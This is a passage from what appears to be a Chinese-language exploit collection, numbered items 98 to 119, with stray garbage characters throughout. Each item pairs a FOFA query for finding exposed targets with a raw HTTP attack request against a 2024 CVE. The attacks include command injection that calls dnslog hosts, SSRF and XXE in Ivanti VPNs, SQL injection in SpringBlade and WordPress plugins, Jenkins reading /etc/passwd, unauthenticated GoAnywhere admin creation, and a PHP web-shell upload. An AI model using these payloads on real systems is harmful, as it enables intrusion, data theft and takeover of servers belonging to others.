6 [9 N. d& A3 J# lAccept-Encoding: gzip- H* t, A3 B1 ]) ^' V$ j6 D) b
Connection: close9 t' P& n; b5 ^5 {% T& }% f  y
Cookie: rememberMe=PAYLOAD
0 a" n% N' o, cX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
& f+ q9 e, R; x7 f4 I! y+ n% V, A+ `- i9 X+ R. B* h
/ @3 b7 U. ~: l+ x
98. SpiderFlow爬虫平台远程命令执行) F# e3 d0 `/ a! u3 G: i" l1 p
CVE-2024-0195) B5 Q, m% u4 I" O3 B) c) o
FOFA:app="SpiderFlow"4 G1 N6 A* A% t4 B* k
POST /function/save HTTP/1.1
0 L4 y% t0 r) f; y8 ^. sHost: 192.168.40.130:8088
! g+ [. E& Y  a1 L1 D+ b) mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.08 j! z5 O9 m; |6 l' Z
Connection: close% W! t0 h* D& R0 h6 w) z
Content-Length: 121. p$ O$ I% v3 k3 [2 c) v
Accept: */*2 o  d$ |' ?1 r2 v
Accept-Encoding: gzip, deflate
0 H; b+ S3 |8 g7 fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( a' O" p6 c7 D: {9 gContent-Type: application/x-www-form-urlencoded; charset=UTF-8' s8 I% t% ?0 p4 f: r" H7 I0 ?$ B
X-Requested-With: XMLHttpRequest) f9 h+ [4 k! N& e
5 F# J) \2 {* a4 H& |
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
7 h' ]) k& a& Y0 Q& y1 t
# X  `. e8 K. b; N( r* D
% a7 F8 ?" m- L! S+ S# {99. Ncast盈可视高清智能录播系统busiFacade RCE
% |: t. ?) l, \+ @$ X4 g8 NCVE-2024-03054 E2 D" ]: `8 ?( }4 Z
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
$ ~# s6 B# [$ M0 BPOST /classes/common/busiFacade.php HTTP/1.15 D* b/ ^1 F  V, t" i* T. X
Host: 192.168.40.130:8080) }9 \; Q( _  ~$ p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! ?" n. ~0 i+ \+ p
Connection: close
! w5 r( z* ^+ a+ _3 \$ V3 }; \5 ZContent-Length: 154: ^3 h  g+ |' v: O; Z8 A8 m
Accept: */*. Z5 s- q: ?( d( J& |
Accept-Encoding: gzip, deflate: V2 R$ W# x' R+ I/ Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  z- v0 `3 ^# s( @
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
% ~; s# E$ W. y4 x2 @X-Requested-With: XMLHttpRequest, Z5 l# Y; S+ Y5 _# r- T

3 y& L! ~" d# x" g) O- v9 E%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D( I& V, j- O  a* n! y3 n

* A: A, H. t3 v% Y( u* y2 o, V' o8 t2 |
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传: P. @/ }/ U4 E
CVE-2024-0352
) _# a; s: ~9 t) `  @FOFA:icon_hash="874152924"3 S: ]2 C- D4 x3 D/ F( O
POST /api/file/formimage HTTP/1.1$ A0 o5 Q) k/ `( z5 t" V
Host: 192.168.40.130
5 r  h. K! Q1 _  j1 M. aUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.366 d! t' Z! b5 G: u3 f2 e
Connection: close3 Z5 H5 r3 B6 ?6 w; _2 R, C, y
Content-Length: 201
% Y, F( e: `* l2 r3 R) GContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei/ x- w+ x9 N% q& D  _% |
Accept-Encoding: gzip$ g4 r# S% y1 X0 L

) B! F2 Y! D. a& I------WebKitFormBoundarygcflwtei4 _9 {3 C4 n5 [) s4 j% b. J
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
; S# h0 ~6 X$ T% N9 ^1 eContent-Type: application/x-php
( @9 K0 g6 k* h; ^. y+ M
) D* ?2 L" ~" D1 y% i& S2ayyhRXiAsKXL8olvF5s4qqyI2O
  _5 ^2 O% Q3 A- Q! |& C6 R" H5 x------WebKitFormBoundarygcflwtei--1 E+ ^, S0 A+ H* T3 F, J: [* @+ X1 B

3 U4 q! S- k5 H2 C
4 j$ K3 x) F' @5 K; I9 T101. ivanti policy secure-22.6命令注入
6 a* |; q! b% m9 F; aCVE-2024-21887- L6 s+ S& G; Z/ ~3 b; D
FOFA:body="welcome.cgi?p=logo"$ G0 |1 F& R! m  e+ C0 ~6 Q* _
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
6 [. V. T. l5 h& e) N" gHost: x.x.x.xx.x.x.x& _" ~9 b" h% ?% T% {0 t  f! D" x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 I2 H6 H4 C" j4 u4 M
Connection: close
7 S; K# Z! J5 K! vAccept-Encoding: gzip( X+ u; e# X/ i; `- q2 V3 y
* g5 S( k6 c: D( O( L; {: Y  u

8 R; l8 V4 _1 J% F2 f; Z# M102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行/ f( L, j& _& s& h) t6 v
CVE-2024-21893
# Q1 Z- w6 {3 f( }FOFA:body="welcome.cgi?p=logo"
, K; K8 r- k: {8 T& ]& UPOST /dana-ws/saml20.ws HTTP/1.15 ]  g4 q" e$ }% ~' Z1 e" @0 G
Host: x.x.x.x& W  x/ ]& @8 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36  D' p3 u4 K  b0 U
Connection: close# k7 {& Y8 J0 S
Content-Length: 7923 ?1 \% k. X- v
Accept-Encoding: gzip2 q7 ~5 T# y' B* i, i* V

" W/ N1 K3 z7 i: [' x/ @<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>! k0 E' S! h# x, O

  ?9 u: k7 ^* W% W1 T103. Ivanti Pulse Connect Secure VPN XXE
2 G; r/ @: z2 P) K  VCVE-2024-22024
, M8 w( {! R/ [3 v2 UFOFA:body="welcome.cgi?p=logo"
, j2 K, n/ c& kPOST /dana-na/auth/saml-sso.cgi HTTP/1.1/ Y  z, Z% D! e) H
Host: 192.168.40.130:111
/ ^( G) O! }* R/ C9 b- mUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
! r  b! J  F0 e, _# BConnection: close/ E) e) V% |4 _5 Z4 S
Content-Length: 204+ ]" x5 P1 R( F7 R6 W
Content-Type: application/x-www-form-urlencoded
) Z% m, ?8 J' w( h. L  IAccept-Encoding: gzip8 d( H0 e) N' ^
6 a* W- I+ J' |+ O5 V( {$ X: \
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==9 k$ X& v5 J; T: N

) K" z+ W( `: n! [
* N8 b3 ~) D5 t# H其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
* ?- C% ?: v2 @+ u& m: s3 N/ |<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>% V4 w$ g9 k3 ]* R
  k/ D; b2 t6 G2 c# J: X

; O; v2 \3 n; `  O104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
' O8 h. I+ c6 T' B3 y4 y) t  {CVE-2024-0569+ x4 i, Y" }& X) z# F
FOFA:title="TOTOLINK"
3 F8 x( h7 }  G' B9 V7 ~POST /cgi-bin/cstecgi.cgi HTTP/1.1
* z$ h% d9 M0 L* e, a) A" T# i+ nHost:192.168.0.15 H8 J& b, N6 g6 c0 {+ F
Content-Length:41
6 Z7 c# d  B/ r  \$ Z. D# FAccept:application/json,text/javascript,*/*;q=0.018 K# @# M& N' F; h- `% p0 W  N
X-Requested-with: XMLHttpRequest
' [3 U0 `4 E. V, M1 E, yUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.362 {3 x- E( O  z" O$ a
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
4 x: M+ d! R7 E& |8 {( K* G! SOrigin: http://192.168.0.1
8 r6 a4 J+ `4 [2 L; m7 KReferer: http://192.168.0.1/advance/index.html?time=1671152380564/ ]0 j6 Q! z, U# s  h, }
Accept-Encoding:gzip,deflate4 n# ]4 B: N$ O) T
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7* @& c. b( V" [8 J& E
Connection:close) R/ v1 V8 J# i

# t) s4 L/ q2 [5 o1 C/ r% Y; Y! P- q{
+ T& `' G( Q4 ^4 y) j"topicurl":"getSysStatusCfg"," [% \/ t5 A8 |* q8 q  @# q
"token":""6 j$ k0 x. u& f
}
. |5 Z. C' X: {1 w3 @/ e1 e' y8 H
105. SpringBlade v3.2.0 export-user SQL 注入2 _( k0 v5 T. j5 _! [3 R
FOFA:body="https://bladex.vip"
! v1 F6 ]9 ?  b+ |0 Bhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
! n2 `8 [- E' V, D: c2 [$ k; ~6 j2 Z) ^1 s8 c
106. SpringBlade dict-biz/list SQL 注入
) {; C& f* m" h  Z+ a) [$ `3 M. hFOFA:body="Saber 将不能正常工作"0 H0 x8 E, ?; R) T
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
+ a3 k) G, I4 b3 U. k7 U8 VHost: your-ip$ h( B+ h+ h- L+ E) O  q4 h8 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 ^& p$ @6 S7 \; tBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A; }/ t2 F8 ]5 K  X2 [
Accept-Encoding: gzip, deflate
0 `" U+ U0 {, N% Y5 HAccept-Language: zh-CN,zh;q=0.9
0 g2 h2 V/ e, H' j% G6 j% u5 z$ {. DConnection: close
- x% T. Y$ _0 s! T# ~4 E' H/ o# N8 z8 v& I

% I8 O! x4 f& e. [107. SpringBlade tenant/list SQL 注入6 o! ?* U# R  b" q+ W
FOFA:body="https://bladex.vip"1 D) x: R& Q- n5 U* k8 M5 [  s! v
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
, ?+ V+ l5 h0 s( }( q9 y+ oHost: your-ip
1 g3 i9 H! p' P- WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 I5 z. r& s) P4 z3 eBlade-Auth:替换为自己的+ v+ _5 K5 s0 P3 f0 C
Connection: close
( {/ v$ R/ L7 F& G7 ~3 E# q; P4 S0 U6 d5 t6 L
( x6 B8 [1 r8 S: ^* k7 g1 h- j) R' ]
108. D-Tale 3.9.0 SSRF% s5 S/ |1 z2 s+ h
CVE-2024-21642
! \: w/ g0 k# b9 l) r9 d' LFOFA:"dtale/static/images/favicon.png"8 C2 e9 h1 a3 J% M: d% T/ g+ ]
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.12 X7 O& D/ s' V$ l7 ?) z
Host: your-ip
" x, p; f" r! UAccept: application/json, text/plain, */*. D  H! g2 i6 y' p9 \$ o' ~1 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
, m( C3 B1 G/ ~Accept-Encoding: gzip, deflate8 w- o! b1 T. N" N
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
4 S- {2 U4 g5 MConnection: close
; T9 z9 Q5 Q9 ~- V% G; V' I! {  Y
0 C! }5 [9 s4 B' h( K3 a4 W6 x+ r4 w; A- |
109. Jenkins CLI 任意文件读取
3 s# b# P$ U* M- R/ gCVE-2024-23897. |6 [' M0 |! v4 H3 n9 |, C
FOFA:header="X-Jenkins"
0 q" G# h' U: ?$ d7 ^' ?# K5 |POST /cli?remoting=false HTTP/1.1
: T+ J9 O' f( [0 QHost:' R7 t- [8 _  c1 p* Y
Content-type: application/octet-stream5 x& l% i6 e4 T; U2 y( V, O
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92# u. _' i1 C8 D8 A
Side: upload
& B, [+ G$ L) N/ L3 a  r: W" J7 HConnection: keep-alive& `' {7 ?; G% ~
Content-Length: 163
) Z2 l* c9 k! z# _. A3 _" K6 i: C6 \
- Z4 R+ H' u4 ?- sb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
7 h- P- h( j; N* Y! m0 ~6 Z. H5 s

$ a% @* W, L; v9 d0 SPOST /cli?remoting=false HTTP/1.1
0 m$ Z9 M8 S- fHost:
* w4 X. @- q+ f9 a$ KSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92  f& [% q4 j; h) p
download& ~: ^9 ~( L3 r- l1 h, `6 F8 @
Content-Type: application/x-www-form-urlencoded
# s# K# _/ Q$ k9 D- gContent-Length: 0( |5 Y& h6 m  z5 P: e

. `. O3 v7 A7 x* X* h5 g
: ^2 S5 B! e( z: z4 a6 BERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  K6 }9 Y* o+ E
java -jar jenkins-cli.jar help5 p$ p. C# ^3 T6 F: R3 X3 {
[COMMAND]' s& ?  j  Q+ m' t
Lists all the available commands or a detailed description of single command.. l! K+ u+ x- g- P5 i- K% @
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)! X" a: }+ O6 h+ L- _! F1 d2 v0 l
& e5 y& E1 t7 T% o/ i

4 g6 h( U7 h4 H0 b. w- j110. Goanywhere MFT 未授权创建管理员. F: v$ A9 j; R' ]) Q) r0 b& j8 z
CVE-2024-0204- r3 \- U" E8 ^7 ~
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
) X% j4 r- X, O" n" E2 {+ s( ]GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
3 s5 X' l' ^2 `' w( oHost: 192.168.40.130:8000
4 N$ s& I. W5 MUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
8 u/ j# E4 `$ q+ B2 p2 MConnection: close
+ w( p. }( M/ w  [7 QAccept: */*! u8 ]. A, `6 `
Accept-Language: en
9 D0 g8 n( e* _  {4 s- D* G  `Accept-Encoding: gzip$ H( f7 _; a5 ]" O# a
5 L5 z: u' ?  k) M" O/ b& b' W( Q2 [

4 H( `2 n5 C( R111. WordPress Plugin HTML5 Video Player SQL注入
% T8 ?7 f% C' M- g# \" R3 RCVE-2024-1061; t; D0 V4 x3 E' Q/ f3 v; G" O
FOFA:"wordpress" && body="html5-video-player"# }: J$ Y- B0 N
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1  H6 n0 b, W5 W% k  R+ {! y1 U: n
Host: 192.168.40.130:112  @1 A5 W! i2 g5 c1 r0 {! Y
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
! ~. M$ g6 s3 ?* ?Connection: close
  \- @  j- x  S- l8 V7 b8 r; y% c: n. `Accept: */*# S6 B; E0 j! q8 o  f$ F9 [
Accept-Language: en1 v1 z' ]2 V5 _. _2 ~
Accept-Encoding: gzip  S* u% Q, q- D% k

6 n& j0 i9 p/ o, B4 }; P7 [& H1 v$ M9 q1 X6 m1 |
112. WordPress Plugin NotificationX SQL 注入
+ s* q& S9 \3 m+ K/ y' LCVE-2024-1698
2 L  E/ ^* U) wFOFA:body="/wp-content/plugins/notificationx"
# a, S0 ?% v4 J! d8 FPOST /wp-json/notificationx/v1/analytics HTTP/1.1
2 X8 C, C5 S1 V8 GHost: {{Hostname}}
! |8 u; ^% W8 ]Content-Type: application/json
. T1 O$ v& [9 R7 C% z. G& k1 k( K* O$ L; D4 F! E
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
9 O% }  Q" h% K' P; Y0 k4 b& B" g% I( I- o2 N# ?) \
. s$ S, J+ l3 ?4 x6 |8 p
113. WordPress Automatic 插件任意文件下载和SSRF! H! f6 U# X  \5 j* u
CVE-2024-27954" [- N& I) s' M1 P5 T% Y
FOFA:"/wp-content/plugins/wp-automatic"
  G7 l7 H4 z9 g. C) _* h+ v5 VGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
2 {4 i/ x7 r1 c% E/ Z4 q9 B- V+ `Host: x.x.x.x* D+ y4 o$ y# d6 j# J/ Y
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
% r: @/ W, I: ]& h. x' [/ `6 y) TConnection: close
/ j+ L* Z: f. o: H) W2 _Accept: */*
5 n0 g0 K3 e1 k7 ^% J& YAccept-Language: en
# H5 n: t0 g' L. @# H7 qAccept-Encoding: gzip
% h6 T5 @, l7 r2 x% n
: V/ R! G& z0 V3 i) }: L) T9 j+ w$ o' ^1 V9 {  L& D( @
114. WordPress MasterStudy LMS插件 SQL注入0 i9 Y0 S: c2 s" K; h1 v6 w% [
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"2 E( Q( P) K: V1 u) i' N
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1- [+ q- `" h! ~& b
Host: your-ip) m. N, }" @  v' E- w5 K8 U$ b
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.368 e, G) D/ f1 ]: W$ i! b/ T
Accept-Charset: utf-8
) s+ f* {0 `% @% f7 Q$ v+ hAccept-Encoding: gzip, deflate8 M9 M& x8 `4 l, T4 z* T
Connection: close
5 w& V, ^+ X* N6 F
, N0 x% l7 K' G0 {) k3 D6 }* R9 u% H* B6 H# v' V: X1 p- Y4 H5 n, j
115. WordPress Bricks Builder <= 1.9.6 RCE
% h9 R  A/ b7 V* e" Q. fCVE-2024-256006 [3 {& O# ]. Z, a
FOFA: body="/wp-content/themes/bricks/"
7 ^6 A8 N- _* E2 j5 m6 E" X第一步,获取网站的nonce值# L/ o4 J& B" y0 ^
GET / HTTP/1.1+ x$ L4 v& `, k3 D- \+ D' b
Host: x.x.x.x
: [' J9 [7 @; v  z$ s; Q9 GUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
; i7 Y7 N: u3 N* o) ]$ P! j! _1 u1 \7 sConnection: close% f3 Q+ m* Z2 O
Accept-Encoding: gzip1 V! M* A! V, V0 C5 D  B& _
& b) H- V. u4 h

7 j. y; Y/ ?& I+ l第二步替换nonce值,执行命令
( j/ M) H1 @) @6 uPOST /wp-json/bricks/v1/render_element HTTP/1.1* n5 v7 g1 @9 c5 f0 O
Host: x.x.x.x
5 n% J: g: Z8 L# E) _4 Z8 i2 bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36' R7 W( @6 {. s4 i; ]
Connection: close1 X. f$ Z) l( j% d- u+ i. y7 _
Content-Length: 3567 i9 s& E3 ]. ^& N: Z
Content-Type: application/json  o3 ?0 |( _. M( H7 j8 V2 U9 c2 d
Accept-Encoding: gzip" M. i; ~+ b" H: ~& b

; q: k! b7 h* t, J{
2 v: b1 V9 d' L5 l" z. ]"postId": "1",
. ^  P5 \, o: f% v! K$ F; W  "nonce": "第一步获得的值",
8 R2 X7 d# t. o) F. K5 y  "element": {
/ t* N! ~5 _3 A% i& b% b5 {    "name": "container",
* A' M6 ^. N, t  _" m, g" z% T    "settings": {
( u+ N0 k7 v7 `4 \. b9 b2 g* q      "hasLoop": "true",7 f3 o( E* e- G& B! L7 x4 m  G" U
      "query": {- P: R! D9 R3 j7 R
        "useQueryEditor": true,
& ?  V+ @* l5 N        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",3 @, b$ n' l8 U
        "objectType": "post"
% J9 W  ?) f* j4 t  \5 t      }! i+ m6 N/ m+ d3 T; a' I2 R
    }3 V5 P9 v0 E( o
  }
$ w, \' e) I+ j3 b( I0 m' o6 W}/ l3 o2 Z) V2 j7 T( g3 g6 Y7 F* g
3 P* A  V4 `- o  e% [1 L

/ e% d/ @9 b8 Q116. wordpress js-support-ticket文件上传
' \1 h2 k( o' h3 q0 O- f9 [0 f3 `FOFA:body="wp-content/plugins/js-support-ticket"7 i( n, }9 Q# w3 C9 i
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
5 C' y! G- H  Q8 QHost:
+ s9 R/ Y- \8 PContent-Type: multipart/form-data; boundary=--------767099171& c% K" N8 b1 [% O! Y
User-Agent: Mozilla/5.0
  ^& y$ \/ v$ g, P' O& `& ]
1 {- z& e/ x1 c! s  s----------767099171. P. V! N0 c! y' \1 a/ e- h$ B
Content-Disposition: form-data; name="action"
0 q! r. ^5 F$ Jconfiguration_saveconfiguration  L/ i* l& O3 r2 O
----------767099171" @% V" q. w# j  G
Content-Disposition: form-data; name="form_request"% E( p4 Y2 N& ]# F" ]7 b  l
jssupportticket
  s1 \6 M' y, t, r# U1 W3 B----------7670991710 k7 i, A8 T9 `7 [* A' r
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
3 R2 q' `5 P/ a) q1 WContent-Type: image/png
1 p7 e2 T; q( e----------767099171--
1 P2 q& A$ W; ~: h! E
9 _% W8 Q( G8 Q1 g8 w; z$ E. ?' {; @- o: \% A5 W
117. WordPress LayerSlider插件SQL注入
8 o# _- x, Y4 ?3 Z# E! v( L' \version:7.9.11 – 7.10.0& |7 s  G$ S* N& y
FOFA:body="/wp-content/plugins/LayerSlider/"4 V! S6 B* _4 e7 v
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
; N' I" I+ [1 ^( F2 LHost: your-ip# ^( |) k2 I6 L1 |! N/ X4 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! d. q: e0 V$ \0 J" p) T+ c( H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* `- M% [# |. l* o' ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! W0 u7 B2 g# c, C! e. H
Accept-Encoding: gzip, deflate, br. ~0 e6 f, |4 M7 `3 R: B
Connection: close- B& \3 y0 }& W# f' F2 c* u: O
Upgrade-Insecure-Requests: 1
" k+ w* }, e5 [" s) R8 Z
- `8 H: q% ]+ |
4 ~1 |- `) h) Q. f: ~+ c118. 北京百绰智能S210管理平台uploadfile.php任意文件上传- q1 [* S6 w$ F6 ]$ h$ |$ e
CVE-2024-0939. B1 Z) i- D8 g' ]1 Y6 }9 o
FOFA:title="Smart管理平台"
- r9 X8 P. H; E' lPOST /Tool/uploadfile.php? HTTP/1.1
/ s: |# F' O0 P1 F% JHost: 192.168.40.130:84438 [" p9 U$ F8 s0 n3 f
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f83 A  a: U  i' i7 n5 n0 y! @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.06 k& i; l: R: B. f- S; R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) a$ j, G8 ?/ K/ J( o& e( j/ gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; a8 f& |! K; f3 Z# f8 zAccept-Encoding: gzip, deflate
" G" j" }, b6 B# {$ ^- J7 XContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
9 a1 p5 ~. {* G/ N+ R2 q- D) RContent-Length: 405
7 f+ {. p" C2 x$ f: qOrigin: https://192.168.40.130:8443+ m) k: k. x, h. Y
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
/ l) L3 p4 z7 m$ S% B/ jUpgrade-Insecure-Requests: 1
& D, T6 V4 J5 R8 k, X: R2 nSec-Fetch-Dest: document
0 b" q$ R+ m0 I7 p* h3 |! o+ Q; XSec-Fetch-Mode: navigate
% _+ c8 D5 v4 t- [Sec-Fetch-Site: same-origin8 m! Z5 D" S/ N" y% n# v
Sec-Fetch-User: ?18 W! f4 q8 f, O) h8 }
Te: trailers
. l* n2 q2 P, f5 y2 @Connection: close
7 x. @- H8 @6 z4 ^9 S6 n0 z) L: J- s8 W6 j- o, h- r+ Y
-----------------------------13979701222747646634037182887: Q* Y9 P& g- X1 F- a, A2 ^
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
+ d$ w5 O1 n+ DContent-Type: application/octet-stream2 _+ z- [, c4 I9 l1 B

# p$ X8 D* D5 |+ s<?php+ r# \* e1 N* J4 N6 h% d
system($_POST["passwd"]);
) q; O  U5 W$ s) A. ]3 D?>$ P' c: A. e2 `3 }* |9 [
-----------------------------13979701222747646634037182887
& _( W# n9 l  q, MContent-Disposition: form-data; name="txt_path"
% L& J- x: e! H9 O% t
/ ~  ?" P+ M8 k" I' `  ]* G% E/home/src.php" b* q: |6 @$ a0 j6 H9 C
-----------------------------13979701222747646634037182887--
0 \" ~6 Z$ |! U2 h, Z4 {+ C/ |/ G
+ {: u5 D  o6 M* e6 E4 e) B* o) e. t
访问/home/src.php/ t" n4 @& W$ w; V5 \: `; ^

, t, h: R: i3 R" c, r6 Y8 K119. 北京百绰智能S20后台sysmanageajax.php sql注入
% g$ C) E$ P0 ]4 {0 Y& ECVE-2024-1254
" A" F# u/ u" ?# `2 K% \6 }2 wFOFA:title="Smart管理平台"
4 |& i; u; h" ]0 _先登录进入系统,默认账号密码为admin/admin
8 {0 t. K$ Q! L- O* \$ M; ~POST /sysmanage/sysmanageajax.php HTTP/1.11
# A# ?7 y; \! ^8 j" X7 n( G( I# l0 NHost: x.x.x.x
